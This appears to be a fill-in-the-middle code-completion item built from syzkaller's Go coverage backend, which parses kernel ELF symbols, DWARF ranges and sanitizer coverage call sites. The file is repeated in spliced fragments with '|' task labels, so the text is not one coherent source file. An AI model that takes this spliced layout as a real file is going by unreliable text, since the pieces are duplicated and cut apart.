if text == nil {
return pcs, fmt.Errorf("no .text section in the object file")
}
data, err := text.Data()
if err != nil {
return pcs, fmt.Errorf("failed to read .text: %v", err)
}
const callLen = 5
end := len(data) - callLen + 1
for i := 0; i < end; i++ {
pos := bytes.IndexByte(data[i:end], 0xe8)
if pos == -1 {
break
}
pos += i
i = pos
off := uint64(int64(int32(binary.LittleEndian.Uint32(data[pos+1:]))))
pc := text.Addr + uint64(pos)
target := pc + off + callLen
if target == tracePC {
pcs[0] = append(pcs[0], pc)
} else if traceCmp[target] {
pcs[1] = append(pcs[1], pc)
}
}
return pcs, nil
}
// objdump is an old, slow way of finding coverage points.
// amd64 uses faster option of parsing binary directly (readCoverPoints).
// TODO: use the faster approach for all other arches and drop this.
func objdump(target *targets.Target, obj string) ([2][]uint64, error) {
var pcs [2][]uint64
cmd := osutil.Command(target.Objdump, "-d", "--no-show-raw-insn", obj)
stdout, err := cmd.StdoutPipe()
if err != nil {
return pcs, err
}
defer stdout.Close()
stderr, err := cmd.StderrPipe()
if err != nil {
return pcs, err
}
defer stderr.Close()
if err := cmd.Start(); err != nil {
return pcs, fmt.Errorf("failed to run objdump on %v: %v", obj, err)
}
defer func() {
cmd.Process.Kill()
cmd.Wait()
}()
s := bufio.NewScanner(stdout)
callInsns, traceFuncs := archCallInsn(target)
for s.Scan() {
if pc := parseLine(callInsns, traceFuncs, s.Bytes()); pc != 0 {
pcs[0] = append(pcs[0], pc)
}
}
stderrOut, _ := ioutil.ReadAll(stderr)
if err := cmd.Wait(); err != nil {
return pcs, fmt.Errorf("failed to run objdump on %v: %v\n%s", obj, err, stderrOut)
}
if err := s.Err(); err != nil {
return pcs, fmt.Errorf("failed to run objdump on %v: %v\n%s", obj, err, stderrOut)
}
return pcs, nil
}
func parseLine(callInsns, traceFuncs [][]byte, ln []byte) uint64 {
pos := -1
for _, callInsn := range callInsns {
if pos = bytes.Index(ln, callInsn); pos != -1 {
break
}
}
if pos == -1 {
return 0
}
hasCall := false
for _, traceFunc := range traceFuncs {
if hasCall = bytes.Contains(ln[pos:], traceFunc); hasCall {
break
}
}
if !hasCall {
return 0
}
for len(ln) != 0 && ln[0] == ' ' {
ln = ln[1:]
}
colon := bytes.IndexByte(ln, ':')
if colon == -1 {
return 0
}
pc, err := strconv.ParseUint(string(ln[:colon]), 16, 64)
if err != nil {
return 0
}
return pc
}
func cleanPath(path, objDir, srcDir, buildDir string) (string, string) {
filename := ""
switch {
case strings.HasPrefix(path, objDir):
// Assume the file was built there.
path = strings.TrimPrefix(path, objDir)
filename = filepath.Join(objDir, path)
case strings.HasPrefix(path, buildDir):
// Assume the file was moved from buildDir to srcDir.
path = strings.TrimPrefix(path, buildDir)
filename = filepath.Join(srcDir, path)
default:
// Assume this is relative path.
filename = filepath.Join(srcDir, path)
}
return strings.TrimLeft(filepath.Clean(path), "/\\"), filename
}
func archCallInsn(target *targets.Target) ([][]byte, [][]byte) {
callName := [][]byte{[]byte(" <__sanitizer_cov_trace_pc>")}
switch target.Arch {
case targets.I386:
// c1000102: call c10001f0 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tcall ")}, callName
case targets.ARM64:
// ffff0000080d9cc0: bl ffff00000820f478 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tbl\t")}, callName
case targets.ARM:
// 8010252c: bl 801c3280 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tbl\t")}, callName
case targets.PPC64LE:
// c00000000006d904: bl c000000000350780 <.__sanitizer_cov_trace_pc>
// This is only known to occur in the test:
// 838: bl 824 <__sanitizer_cov_trace_pc+0x8>
// This occurs on PPC64LE:
// c0000000001c21a8: bl c0000000002df4a0 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tbl ")}, [][]byte{
[]byte("<__sanitizer_cov_trace_pc>"),
[]byte("<__sanitizer_cov_trace_pc+0x8>"),
[]byte(" <.__sanitizer_cov_trace_pc>"),
}
case targets.MIPS64LE:
// ffffffff80100420: jal ffffffff80205880 <__sanitizer_cov_trace_pc>
// This is only known to occur in the test:
// b58: bal b30 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tjal\t"), []byte("\tbal\t")}, callName
case targets.S390x:
// 1001de: brasl %r14,2bc090 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tbrasl\t")}, callName
case targets.RiscV64:
// ffffffe000200018: jal ra,ffffffe0002935b0 <__sanitizer_cov_trace_pc>
// ffffffe0000010da: jalr 1242(ra) # ffffffe0002935b0 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tjal\t"), []byte("\tjalr\t")}, callName
default:
panic(fmt.Sprintf("unknown arch %q", target.Arch))
}
}
| symbolize | identifier_name |
elf.go | // Copyright 2020 syzkaller project authors. All rights reserved.
// Use of this source code is governed by Apache 2 LICENSE that can be found in the LICENSE file.
package backend
import (
"bufio"
"bytes"
"debug/dwarf"
"debug/elf"
"encoding/binary"
"fmt"
"io/ioutil"
"path/filepath"
"runtime"
"sort"
"strconv"
"strings"
"github.com/google/syzkaller/pkg/osutil"
"github.com/google/syzkaller/pkg/symbolizer"
"github.com/google/syzkaller/sys/targets"
)
func makeELF(target *targets.Target, objDir, srcDir, buildDir string) (*Impl, error) {
kernelObject := filepath.Join(objDir, target.KernelObject)
file, err := elf.Open(kernelObject)
if err != nil {
return nil, err
}
// Here and below index 0 refers to coverage callbacks (__sanitizer_cov_trace_pc)
// and index 1 refers to comparison callbacks (__sanitizer_cov_trace_cmp*).
var coverPoints [2][]uint64
var symbols []*Symbol
var textAddr uint64
errc := make(chan error, 1)
go func() {
symbols1, textAddr1, tracePC, traceCmp, err := readSymbols(file)
if err != nil {
errc <- err
return
}
symbols, textAddr = symbols1, textAddr1
if target.OS == targets.FreeBSD {
// On FreeBSD .text address in ELF is 0, but .text is actually mapped at 0xffffffff.
textAddr = ^uint64(0)
}
if target.Arch == targets.AMD64 {
coverPoints, err = readCoverPoints(file, tracePC, traceCmp)
} else {
coverPoints, err = objdump(target, kernelObject)
}
errc <- err
}()
ranges, units, err := readTextRanges(file)
if err != nil {
return nil, err
}
if err := <-errc; err != nil {
return nil, err
}
if len(coverPoints[0]) == 0 {
return nil, fmt.Errorf("%v doesn't contain coverage callbacks (set CONFIG_KCOV=y)", kernelObject)
}
symbols = buildSymbols(symbols, ranges, coverPoints)
nunit := 0
for _, unit := range units {
if len(unit.PCs) == 0 {
continue // drop the unit
}
unit.Name, unit.Path = cleanPath(unit.Name, objDir, srcDir, buildDir)
units[nunit] = unit
nunit++
}
units = units[:nunit]
if len(symbols) == 0 || len(units) == 0 {
return nil, fmt.Errorf("failed to parse DWARF (set CONFIG_DEBUG_INFO=y?)")
}
impl := &Impl{
Units: units,
Symbols: symbols,
Symbolize: func(pcs []uint64) ([]Frame, error) {
return symbolize(target, objDir, srcDir, buildDir, kernelObject, pcs)
},
RestorePC: func(pc uint32) uint64 {
return PreviousInstructionPC(target, RestorePC(pc, uint32(textAddr>>32)))
},
}
return impl, nil
}
type pcRange struct {
start uint64
end uint64
unit *CompileUnit
}
func buildSymbols(symbols []*Symbol, ranges []pcRange, coverPoints [2][]uint64) []*Symbol {
// Assign coverage point PCs to symbols.
// Both symbols and coverage points are sorted, so we do it one pass over both.
selectPCs := func(u *ObjectUnit, typ int) *[]uint64 {
return [2]*[]uint64{&u.PCs, &u.CMPs}[typ]
}
for pcType := range coverPoints {
pcs := coverPoints[pcType]
var curSymbol *Symbol
firstSymbolPC, symbolIdx := -1, 0
for i := 0; i < len(pcs); i++ {
pc := pcs[i]
for ; symbolIdx < len(symbols) && pc >= symbols[symbolIdx].End; symbolIdx++ {
}
var symb *Symbol
if symbolIdx < len(symbols) && pc >= symbols[symbolIdx].Start && pc < symbols[symbolIdx].End {
symb = symbols[symbolIdx]
}
if curSymbol != nil && curSymbol != symb {
*selectPCs(&curSymbol.ObjectUnit, pcType) = pcs[firstSymbolPC:i]
firstSymbolPC = -1
}
curSymbol = symb
if symb != nil && firstSymbolPC == -1 {
firstSymbolPC = i
}
}
if curSymbol != nil {
*selectPCs(&curSymbol.ObjectUnit, pcType) = pcs[firstSymbolPC:]
}
}
// Assign compile units to symbols based on unit pc ranges.
// Do it one pass as both are sorted.
nsymbol := 0
rangeIndex := 0
for _, s := range symbols {
for ; rangeIndex < len(ranges) && ranges[rangeIndex].end <= s.Start; rangeIndex++ {
}
if rangeIndex == len(ranges) || s.Start < ranges[rangeIndex].start || len(s.PCs) == 0 {
continue // drop the symbol
}
unit := ranges[rangeIndex].unit
s.Unit = unit
symbols[nsymbol] = s
nsymbol++
}
symbols = symbols[:nsymbol]
for pcType := range coverPoints {
for _, s := range symbols {
symbPCs := selectPCs(&s.ObjectUnit, pcType)
unitPCs := selectPCs(&s.Unit.ObjectUnit, pcType)
pos := len(*unitPCs)
*unitPCs = append(*unitPCs, *symbPCs...)
*symbPCs = (*unitPCs)[pos:]
}
}
return symbols
}
func readSymbols(file *elf.File) ([]*Symbol, uint64, uint64, map[uint64]bool, error) {
text := file.Section(".text")
if text == nil {
return nil, 0, 0, nil, fmt.Errorf("no .text section in the object file")
}
allSymbols, err := file.Symbols()
if err != nil {
return nil, 0, 0, nil, fmt.Errorf("failed to read ELF symbols: %v", err)
}
traceCmp := make(map[uint64]bool)
var tracePC uint64
var symbols []*Symbol
for _, symb := range allSymbols {
if symb.Value < text.Addr || symb.Value+symb.Size > text.Addr+text.Size {
continue
}
symbols = append(symbols, &Symbol{
ObjectUnit: ObjectUnit{
Name: symb.Name,
},
Start: symb.Value,
End: symb.Value + symb.Size,
})
if strings.HasPrefix(symb.Name, "__sanitizer_cov_trace_") {
if symb.Name == "__sanitizer_cov_trace_pc" {
tracePC = symb.Value
} else {
traceCmp[symb.Value] = true
}
}
}
if tracePC == 0 {
return nil, 0, 0, nil, fmt.Errorf("no __sanitizer_cov_trace_pc symbol in the object file")
}
sort.Slice(symbols, func(i, j int) bool {
return symbols[i].Start < symbols[j].Start
})
return symbols, text.Addr, tracePC, traceCmp, nil
}
func readTextRanges(file *elf.File) ([]pcRange, []*CompileUnit, error) {
text := file.Section(".text")
if text == nil {
return nil, nil, fmt.Errorf("no .text section in the object file")
}
kaslr := file.Section(".rela.text") != nil
debugInfo, err := file.DWARF()
if err != nil {
return nil, nil, fmt.Errorf("failed to parse DWARF: %v (set CONFIG_DEBUG_INFO=y?)", err)
}
var ranges []pcRange
var units []*CompileUnit
for r := debugInfo.Reader(); ; {
ent, err := r.Next()
if err != nil {
return nil, nil, err
}
if ent == nil {
break
}
if ent.Tag != dwarf.TagCompileUnit {
return nil, nil, fmt.Errorf("found unexpected tag %v on top level", ent.Tag)
}
attrName := ent.Val(dwarf.AttrName)
if attrName == nil {
continue
}
unit := &CompileUnit{
ObjectUnit: ObjectUnit{
Name: attrName.(string),
},
}
units = append(units, unit)
ranges1, err := debugInfo.Ranges(ent)
if err != nil {
return nil, nil, err
}
for _, r := range ranges1 {
if r[0] >= r[1] || r[0] < text.Addr || r[1] > text.Addr+text.Size {
if kaslr {
// Linux kernel binaries with CONFIG_RANDOMIZE_BASE=y are strange.
// .text starts at 0xffffffff81000000 and symbols point there as well,
// but PC ranges point to addresses around 0.
// So try to add text offset and retry the check.
// It's unclear if we also need some offset on top of text.Addr,
// it gives approximately correct addresses, but not necessary precisely
// correct addresses.
r[0] += text.Addr
r[1] += text.Addr
if r[0] >= r[1] || r[0] < text.Addr || r[1] > text.Addr+text.Size {
continue
}
}
}
ranges = append(ranges, pcRange{r[0], r[1], unit})
}
r.SkipChildren()
}
sort.Slice(ranges, func(i, j int) bool {
return ranges[i].start < ranges[j].start
})
return ranges, units, nil
}
func symbolize(target *targets.Target, objDir, srcDir, buildDir, obj string, pcs []uint64) ([]Frame, error) |
// readCoverPoints finds all coverage points (calls of __sanitizer_cov_trace_pc) in the object file.
// Currently it is amd64-specific: looks for e8 opcode and correct offset.
// Running objdump on the whole object file is too slow.
func readCoverPoints(file *elf.File, tracePC uint64, traceCmp map[uint64]bool) ([2][]uint64, error) {
var pcs [2][]uint64
text := file.Section(".text")
if text == nil {
return pcs, fmt.Errorf("no .text section in the object file")
}
data, err := text.Data()
if err != nil {
return pcs, fmt.Errorf("failed to read .text: %v", err)
}
const callLen = 5
end := len(data) - callLen + 1
for i := 0; i < end; i++ {
pos := bytes.IndexByte(data[i:end], 0xe8)
if pos == -1 {
break
}
pos += i
i = pos
off := uint64(int64(int32(binary.LittleEndian.Uint32(data[pos+1:]))))
pc := text.Addr + uint64(pos)
target := pc + off + callLen
if target == tracePC {
pcs[0] = append(pcs[0], pc)
} else if traceCmp[target] {
pcs[1] = append(pcs[1], pc)
}
}
return pcs, nil
}
// objdump is an old, slow way of finding coverage points.
// amd64 uses faster option of parsing binary directly (readCoverPoints).
// TODO: use the faster approach for all other arches and drop this.
func objdump(target *targets.Target, obj string) ([2][]uint64, error) {
var pcs [2][]uint64
cmd := osutil.Command(target.Objdump, "-d", "--no-show-raw-insn", obj)
stdout, err := cmd.StdoutPipe()
if err != nil {
return pcs, err
}
defer stdout.Close()
stderr, err := cmd.StderrPipe()
if err != nil {
return pcs, err
}
defer stderr.Close()
if err := cmd.Start(); err != nil {
return pcs, fmt.Errorf("failed to run objdump on %v: %v", obj, err)
}
defer func() {
cmd.Process.Kill()
cmd.Wait()
}()
s := bufio.NewScanner(stdout)
callInsns, traceFuncs := archCallInsn(target)
for s.Scan() {
if pc := parseLine(callInsns, traceFuncs, s.Bytes()); pc != 0 {
pcs[0] = append(pcs[0], pc)
}
}
stderrOut, _ := ioutil.ReadAll(stderr)
if err := cmd.Wait(); err != nil {
return pcs, fmt.Errorf("failed to run objdump on %v: %v\n%s", obj, err, stderrOut)
}
if err := s.Err(); err != nil {
return pcs, fmt.Errorf("failed to run objdump on %v: %v\n%s", obj, err, stderrOut)
}
return pcs, nil
}
func parseLine(callInsns, traceFuncs [][]byte, ln []byte) uint64 {
pos := -1
for _, callInsn := range callInsns {
if pos = bytes.Index(ln, callInsn); pos != -1 {
break
}
}
if pos == -1 {
return 0
}
hasCall := false
for _, traceFunc := range traceFuncs {
if hasCall = bytes.Contains(ln[pos:], traceFunc); hasCall {
break
}
}
if !hasCall {
return 0
}
for len(ln) != 0 && ln[0] == ' ' {
ln = ln[1:]
}
colon := bytes.IndexByte(ln, ':')
if colon == -1 {
return 0
}
pc, err := strconv.ParseUint(string(ln[:colon]), 16, 64)
if err != nil {
return 0
}
return pc
}
func cleanPath(path, objDir, srcDir, buildDir string) (string, string) {
filename := ""
switch {
case strings.HasPrefix(path, objDir):
// Assume the file was built there.
path = strings.TrimPrefix(path, objDir)
filename = filepath.Join(objDir, path)
case strings.HasPrefix(path, buildDir):
// Assume the file was moved from buildDir to srcDir.
path = strings.TrimPrefix(path, buildDir)
filename = filepath.Join(srcDir, path)
default:
// Assume this is relative path.
filename = filepath.Join(srcDir, path)
}
return strings.TrimLeft(filepath.Clean(path), "/\\"), filename
}
func archCallInsn(target *targets.Target) ([][]byte, [][]byte) {
callName := [][]byte{[]byte(" <__sanitizer_cov_trace_pc>")}
switch target.Arch {
case targets.I386:
// c1000102: call c10001f0 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tcall ")}, callName
case targets.ARM64:
// ffff0000080d9cc0: bl ffff00000820f478 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tbl\t")}, callName
case targets.ARM:
// 8010252c: bl 801c3280 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tbl\t")}, callName
case targets.PPC64LE:
// c00000000006d904: bl c000000000350780 <.__sanitizer_cov_trace_pc>
// This is only known to occur in the test:
// 838: bl 824 <__sanitizer_cov_trace_pc+0x8>
// This occurs on PPC64LE:
// c0000000001c21a8: bl c0000000002df4a0 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tbl ")}, [][]byte{
[]byte("<__sanitizer_cov_trace_pc>"),
[]byte("<__sanitizer_cov_trace_pc+0x8>"),
[]byte(" <.__sanitizer_cov_trace_pc>"),
}
case targets.MIPS64LE:
// ffffffff80100420: jal ffffffff80205880 <__sanitizer_cov_trace_pc>
// This is only known to occur in the test:
// b58: bal b30 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tjal\t"), []byte("\tbal\t")}, callName
case targets.S390x:
// 1001de: brasl %r14,2bc090 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tbrasl\t")}, callName
case targets.RiscV64:
// ffffffe000200018: jal ra,ffffffe0002935b0 <__sanitizer_cov_trace_pc>
// ffffffe0000010da: jalr 1242(ra) # ffffffe0002935b0 <__sanitizer_cov_trace_pc>
return [][]byte{[]byte("\tjal\t"), []byte("\tjalr\t")}, callName
default:
panic(fmt.Sprintf("unknown arch %q", target.Arch))
}
}
| {
procs := runtime.GOMAXPROCS(0) / 2
if need := len(pcs) / 1000; procs > need {
procs = need
}
const (
minProcs = 1
maxProcs = 4
)
// addr2line on a beefy vmlinux takes up to 1.6GB of RAM, so don't create too many of them.
if procs > maxProcs {
procs = maxProcs
}
if procs < minProcs {
procs = minProcs
}
type symbolizerResult struct {
frames []symbolizer.Frame
err error
}
symbolizerC := make(chan symbolizerResult, procs)
pcchan := make(chan []uint64, procs)
for p := 0; p < procs; p++ {
go func() {
symb := symbolizer.NewSymbolizer(target)
defer symb.Close()
var res symbolizerResult
for pcs := range pcchan {
frames, err := symb.SymbolizeArray(obj, pcs)
if err != nil {
res.err = fmt.Errorf("failed to symbolize: %v", err)
}
res.frames = append(res.frames, frames...)
}
symbolizerC <- res
}()
}
for i := 0; i < len(pcs); {
end := i + 100
if end > len(pcs) {
end = len(pcs)
}
pcchan <- pcs[i:end]
i = end
}
close(pcchan)
var err0 error
var frames []Frame
for p := 0; p < procs; p++ {
res := <-symbolizerC
if res.err != nil {
err0 = res.err
}
for _, frame := range res.frames {
name, path := cleanPath(frame.File, objDir, srcDir, buildDir)
frames = append(frames, Frame{
PC: frame.PC,
Name: name,
Path: path,
Range: Range{
StartLine: frame.Line,
StartCol: 0,
EndLine: frame.Line,
EndCol: LineEnd,
},
})
}
}
if err0 != nil {
return nil, err0
}
return frames, nil
} | identifier_body |
elf.go | // Copyright 2020 syzkaller project authors. All rights reserved.
// Use of this source code is governed by Apache 2 LICENSE that can be found in the LICENSE file.
package backend
import (
"bufio"
"bytes"
"debug/dwarf"
"debug/elf"
"encoding/binary"
"fmt"
"io/ioutil"
"path/filepath"
"runtime"
"sort"
"strconv"
"strings"
"github.com/google/syzkaller/pkg/osutil"
"github.com/google/syzkaller/pkg/symbolizer"
"github.com/google/syzkaller/sys/targets"
)
func makeELF(target *targets.Target, objDir, srcDir, buildDir string) (*Impl, error) {
kernelObject := filepath.Join(objDir, target.KernelObject)
file, err := elf.Open(kernelObject)
if err != nil {
return nil, err
}
// Here and below index 0 refers to coverage callbacks (__sanitizer_cov_trace_pc)
// and index 1 refers to comparison callbacks (__sanitizer_cov_trace_cmp*).
var coverPoints [2][]uint64
var symbols []*Symbol
var textAddr uint64
errc := make(chan error, 1)
go func() {
symbols1, textAddr1, tracePC, traceCmp, err := readSymbols(file)
if err != nil {
errc <- err
return
}
symbols, textAddr = symbols1, textAddr1
if target.OS == targets.FreeBSD {
// On FreeBSD .text address in ELF is 0, but .text is actually mapped at 0xffffffff.
textAddr = ^uint64(0)
}
if target.Arch == targets.AMD64 {
coverPoints, err = readCoverPoints(file, tracePC, traceCmp)
} else {
coverPoints, err = objdump(target, kernelObject)
}
errc <- err
}()
ranges, units, err := readTextRanges(file)
if err != nil {
return nil, err
}
if err := <-errc; err != nil {
return nil, err
}
if len(coverPoints[0]) == 0 {
return nil, fmt.Errorf("%v doesn't contain coverage callbacks (set CONFIG_KCOV=y)", kernelObject)
}
symbols = buildSymbols(symbols, ranges, coverPoints)
nunit := 0
for _, unit := range units {
if len(unit.PCs) == 0 {
continue // drop the unit
}
unit.Name, unit.Path = cleanPath(unit.Name, objDir, srcDir, buildDir)
units[nunit] = unit
nunit++
}
units = units[:nunit]
if len(symbols) == 0 || len(units) == 0 {
return nil, fmt.Errorf("failed to parse DWARF (set CONFIG_DEBUG_INFO=y?)")
}
impl := &Impl{
Units: units,
Symbols: symbols,
Symbolize: func(pcs []uint64) ([]Frame, error) {
return symbolize(target, objDir, srcDir, buildDir, kernelObject, pcs)
},
RestorePC: func(pc uint32) uint64 {
return PreviousInstructionPC(target, RestorePC(pc, uint32(textAddr>>32)))
},
}
return impl, nil
}
type pcRange struct {
start uint64
end uint64
unit *CompileUnit
}
func buildSymbols(symbols []*Symbol, ranges []pcRange, coverPoints [2][]uint64) []*Symbol {
// Assign coverage point PCs to symbols.
// Both symbols and coverage points are sorted, so we do it one pass over both.
selectPCs := func(u *ObjectUnit, typ int) *[]uint64 {
return [2]*[]uint64{&u.PCs, &u.CMPs}[typ]
}
for pcType := range coverPoints {
pcs := coverPoints[pcType]
var curSymbol *Symbol
firstSymbolPC, symbolIdx := -1, 0
for i := 0; i < len(pcs); i++ {
pc := pcs[i]
for ; symbolIdx < len(symbols) && pc >= symbols[symbolIdx].End; symbolIdx++ {
}
var symb *Symbol
if symbolIdx < len(symbols) && pc >= symbols[symbolIdx].Start && pc < symbols[symbolIdx].End {
symb = symbols[symbolIdx]
}
if curSymbol != nil && curSymbol != symb {
*selectPCs(&curSymbol.ObjectUnit, pcType) = pcs[firstSymbolPC:i]
firstSymbolPC = -1
}
curSymbol = symb
if symb != nil && firstSymbolPC == -1 {
firstSymbolPC = i
}
}
if curSymbol != nil {
*selectPCs(&curSymbol.ObjectUnit, pcType) = pcs[firstSymbolPC:]
}
}
// Assign compile units to symbols based on unit pc ranges.
// Do it one pass as both are sorted.
nsymbol := 0
rangeIndex := 0
for _, s := range symbols {
for ; rangeIndex < len(ranges) && ranges[rangeIndex].end <= s.Start; rangeIndex++ {
}
if rangeIndex == len(ranges) || s.Start < ranges[rangeIndex].start || len(s.PCs) == 0 {
continue // drop the symbol
}
unit := ranges[rangeIndex].unit
s.Unit = unit
symbols[nsymbol] = s
nsymbol++
}
symbols = symbols[:nsymbol]
for pcType := range coverPoints {
for _, s := range symbols {
symbPCs := selectPCs(&s.ObjectUnit, pcType)
unitPCs := selectPCs(&s.Unit.ObjectUnit, pcType)
pos := len(*unitPCs)
*unitPCs = append(*unitPCs, *symbPCs...)
*symbPCs = (*unitPCs)[pos:]
}
}
return symbols
}
func readSymbols(file *elf.File) ([]*Symbol, uint64, uint64, map[uint64]bool, error) {
text := file.Section(".text")
if text == nil {
return nil, 0, 0, nil, fmt.Errorf("no .text section in the object file")
}
allSymbols, err := file.Symbols()
if err != nil {
return nil, 0, 0, nil, fmt.Errorf("failed to read ELF symbols: %v", err)
}
traceCmp := make(map[uint64]bool)
var tracePC uint64
var symbols []*Symbol
for _, symb := range allSymbols {
if symb.Value < text.Addr || symb.Value+symb.Size > text.Addr+text.Size {
continue
}
symbols = append(symbols, &Symbol{
ObjectUnit: ObjectUnit{
Name: symb.Name,
},
Start: symb.Value,
End: symb.Value + symb.Size,
})
if strings.HasPrefix(symb.Name, "__sanitizer_cov_trace_") {
if symb.Name == "__sanitizer_cov_trace_pc" {
tracePC = symb.Value
} else {
traceCmp[symb.Value] = true
}
}
}
if tracePC == 0 {
return nil, 0, 0, nil, fmt.Errorf("no __sanitizer_cov_trace_pc symbol in the object file")
}
sort.Slice(symbols, func(i, j int) bool {
return symbols[i].Start < symbols[j].Start
})
return symbols, text.Addr, tracePC, traceCmp, nil
}
func readTextRanges(file *elf.File) ([]pcRange, []*CompileUnit, error) {
text := file.Section(".text")
if text == nil {
return nil, nil, fmt.Errorf("no .text section in the object file")
}
kaslr := file.Section(".rela.text") != nil
debugInfo, err := file.DWARF()
if err != nil {
return nil, nil, fmt.Errorf("failed to parse DWARF: %v (set CONFIG_DEBUG_INFO=y?)", err)
}
var ranges []pcRange
var units []*CompileUnit
for r := debugInfo.Reader(); ; {
ent, err := r.Next()
if err != nil {
return nil, nil, err
}
if ent == nil {
break
}
if ent.Tag != dwarf.TagCompileUnit {
return nil, nil, fmt.Errorf("found unexpected tag %v on top level", ent.Tag)
}
attrName := ent.Val(dwarf.AttrName)
if attrName == nil {
continue
}
unit := &CompileUnit{
ObjectUnit: ObjectUnit{
Name: attrName.(string),
},
}
units = append(units, unit)
ranges1, err := debugInfo.Ranges(ent)
if err != nil {
return nil, nil, err
}
for _, r := range ranges1 {
if r[0] >= r[1] || r[0] < text.Addr || r[1] > text.Addr+text.Size {
if kaslr {
// Linux kernel binaries with CONFIG_RANDOMIZE_BASE=y are strange.
// .text starts at 0xffffffff81000000 and symbols point there as well,
// but PC ranges point to addresses around 0.
// So try to add text offset and retry the check.
// It's unclear if we also need some offset on top of text.Addr,
// it gives approximately correct addresses, but not necessary precisely
// correct addresses.
r[0] += text.Addr
r[1] += text.Addr
if r[0] >= r[1] || r[0] < text.Addr || r[1] > text.Addr+text.Size {
continue
}
}
}
ranges = append(ranges, pcRange{r[0], r[1], unit})
}
r.SkipChildren()
}
sort.Slice(ranges, func(i, j int) bool {
return ranges[i].start < ranges[j].start
})
return ranges, units, nil
}
func symbolize(target *targets.Target, objDir, srcDir, buildDir, obj string, pcs []uint64) ([]Frame, error) {
procs := runtime.GOMAXPROCS(0) / 2
if need := len(pcs) / 1000; procs > need {
procs = need
}
const (
minProcs = 1
maxProcs = 4
)
// addr2line on a beefy vmlinux takes up to 1.6GB of RAM, so don't create too many of them.
if procs > maxProcs {
procs = maxProcs
}
if procs < minProcs {
procs = minProcs
}
type symbolizerResult struct {
frames []symbolizer.Frame
err error
}
symbolizerC := make(chan symbolizerResult, procs)
pcchan := make(chan []uint64, procs)
for p := 0; p < procs; p++ {
go func() {
symb := symbolizer.NewSymbolizer(target)
defer symb.Close()
var res symbolizerResult
for pcs := range pcchan {
frames, err := symb.SymbolizeArray(obj, pcs)
if err != nil {
res.err = fmt.Errorf("failed to symbolize: %v", err)
}
res.frames = append(res.frames, frames...)
}
symbolizerC <- res
}()
}
for i := 0; i < len(pcs); {
end := i + 100
if end > len(pcs) {
end = len(pcs)
}
pcchan <- pcs[i:end]
i = end
}
close(pcchan)
var err0 error
var frames []Frame
for p := 0; p < procs; p++ {
res := <-symbolizerC
if res.err != nil {
err0 = res.err
}
for _, frame := range res.frames {
name, path := cleanPath(frame.File, objDir, srcDir, buildDir)
frames = append(frames, Frame{
PC: frame.PC,
Name: name,
Path: path,
Range: Range{
StartLine: frame.Line,
StartCol: 0,
EndLine: frame.Line,
EndCol: LineEnd,
},
})
}
}
if err0 != nil {
return nil, err0
}
return frames, nil
}
// readCoverPoints finds all coverage points (calls of __sanitizer_cov_trace_pc) in the object file.
// Currently it is amd64-specific: looks for e8 opcode and correct offset.
// Running objdump on the whole object file is too slow.
func readCoverPoints(file *elf.File, tracePC uint64, traceCmp map[uint64]bool) ([2][]uint64, error) {
var pcs [2][]uint64
text := file.Section(".text")
if text == nil {
return pcs, fmt.Errorf("no .text section in the object file")
}
data, err := text.Data()
if err != nil {
return pcs, fmt.Errorf("failed to read .text: %v", err)
}
const callLen = 5
end := len(data) - callLen + 1
for i := 0; i < end; i++ {
pos := bytes.IndexByte(data[i:end], 0xe8)
if pos == -1 |
pos += i
i = pos
off := uint64(int64(int32(binary.LittleEndian.Uint32(data[pos+1:]))))
pc := text.Addr + uint64(pos)
target := pc + off + callLen
if target == tracePC {
pcs[0] = append(pcs[0], pc)
} else if traceCmp[target] {
pcs[1] = append(pcs[1], pc)
}
}
return pcs, nil
}
// objdump is an old, slow way of finding coverage points.
// amd64 uses faster option of parsing binary directly (readCoverPoints).
// TODO: use the faster approach for all other arches and drop this.
func objdump(target *targets.Target, obj string) ([2][]uint64, error) {
var pcs [2][]uint64
cmd := osutil.Command(target.Objdump, "-d", "--no-show-raw-insn", obj)
stdout, err := cmd.StdoutPipe()
if err != nil {
return pcs, err
}
defer stdout.Close()
stderr, err := cmd.StderrPipe()
if err != nil {
return pcs, err
}
defer stderr.Close()
if err := cmd.Start(); err != nil {
return pcs, fmt.Errorf("failed to run objdump on %v: %v", obj, err)
}
defer func() {
cmd.Process.Kill()
cmd.Wait()
}()
s := bufio.NewScanner(stdout)
callInsns, traceFuncs := archCallInsn(target)
for s.Scan() {
if pc := parseLine(callInsns, traceFuncs, s.Bytes()); pc != 0 {
pcs[0] = append(pcs[0], pc)
}
}
stderrOut, _ := ioutil.ReadAll(stderr)
if err := cmd.Wait(); err != nil {
return pcs, fmt.Errorf("failed to run objdump on %v: %v\n%s", obj, err, stderrOut)
}
if err := s.Err(); err != nil {
return pcs, fmt.Errorf("failed to run objdump on %v: %v\n%s", obj, err, stderrOut)
}
return pcs, nil
}
func parseLine(callInsns, traceFuncs [][]byte, ln []byte) uint64 {
pos := -1
for _, callInsn := range callInsns {
if pos = bytes.Index(ln, callInsn); pos != -1 {
break
}
}
if pos == -1 {
return 0
}
hasCall := false
for _, traceFunc := range traceFuncs {
if hasCall = bytes.Contains(ln[pos:], traceFunc); hasCall {
break
}
}
if !hasCall {
return 0
}
for len(ln) != 0 && ln[0] == ' ' {
ln = ln[1:]
}
colon := bytes.IndexByte(ln, ':')
if colon == -1 {
return 0
}
pc, err := strconv.ParseUint(string(ln[:colon]), 16, 64)
if err != nil {
return 0
}
return pc
}
func cleanPath(path, objDir, srcDir, buildDir string) (string, string) {
filename := ""
switch {
case strings.HasPrefix(path, objDir):
// Assume the file was built there.
path = strings.TrimPrefix(path, objDir)
filename = filepath.Join(objDir, path)
case strings.HasPrefix(path, buildDir):
// Assume the file was moved from buildDir to srcDir.
path = strings.TrimPrefix(path, buildDir)
filename = filepath.Join(srcDir, path)
default:
// Assume this is relative path.
filename = filepath.Join(srcDir, path)
}
